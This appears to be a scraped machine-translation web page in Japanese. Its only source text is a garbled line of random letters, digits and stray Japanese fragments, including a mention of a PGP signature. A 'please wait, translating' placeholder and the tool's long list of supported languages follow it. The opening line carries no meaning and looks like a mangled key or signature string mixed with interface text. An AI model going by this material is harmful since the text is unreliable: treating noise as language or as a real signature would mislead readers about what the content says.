aj8dician0edugqkftlbxkshh4e9spxeqlfrmz1kla76pelhzjwnyhkub4o＝3＝tnww訳ですが-----端pgp署名

翻訳されて、しばらくお待ちください..

他の言語

翻訳ツールのサポート: アイスランド語, アイルランド語, アゼルバイジャン語, アフリカーンス語, アムハラ語, アラビア語, アルバニア語, アルメニア語, イタリア語, イディッシュ語, イボ語, インドネシア語, ウイグル語, ウェールズ語, ウクライナ語, ウズベク語, ウルドゥ語, エストニア語, エスペラント語, オランダ語, オリヤ語, カザフ語, カタルーニャ語, カンナダ語, ガリシア語, キニヤルワンダ語, キルギス語, ギリシャ語, クメール語, クリンゴン, クルド語, クロアチア語, グジャラト語, コルシカ語, コーサ語, サモア語, ショナ語, シンド語, シンハラ語, ジャワ語, ジョージア（グルジア）語, スウェーデン語, スコットランドゲール語, スペイン語, スロバキア語, スロベニア語, スワヒリ語, スンダ語, ズールー語, セブアノ語, セルビア語, ソト語, ソマリ語, タイ語, タガログ語, タジク語, タタール語, タミル語, チェコ語, チェワ語, テルグ語, デンマーク語, トルクメン語, トルコ語, ドイツ語, ネパール語, ノルウェー語, ハイチ語, ハウサ語, ハワイ語, ハンガリー語, バスク語, パシュト語, パンジャブ語, ヒンディー語, フィンランド語, フランス語, フリジア語, ブルガリア語, ヘブライ語, ベトナム語, ベラルーシ語, ベンガル語, ペルシャ語, ボスニア語, ポルトガル語, ポーランド語, マオリ語, マケドニア語, マラガシ語, マラヤーラム語, マラーティー語, マルタ語, マレー語, ミャンマー語, モンゴル語, モン語, ヨルバ語, ラオ語, ラテン語, ラトビア語, リトアニア語, ルクセンブルク語, ルーマニア語, ロシア語, 中国語, 日本語, 繁体字中国語, 英語, 言語を検出する, 韓国語, 言語翻訳.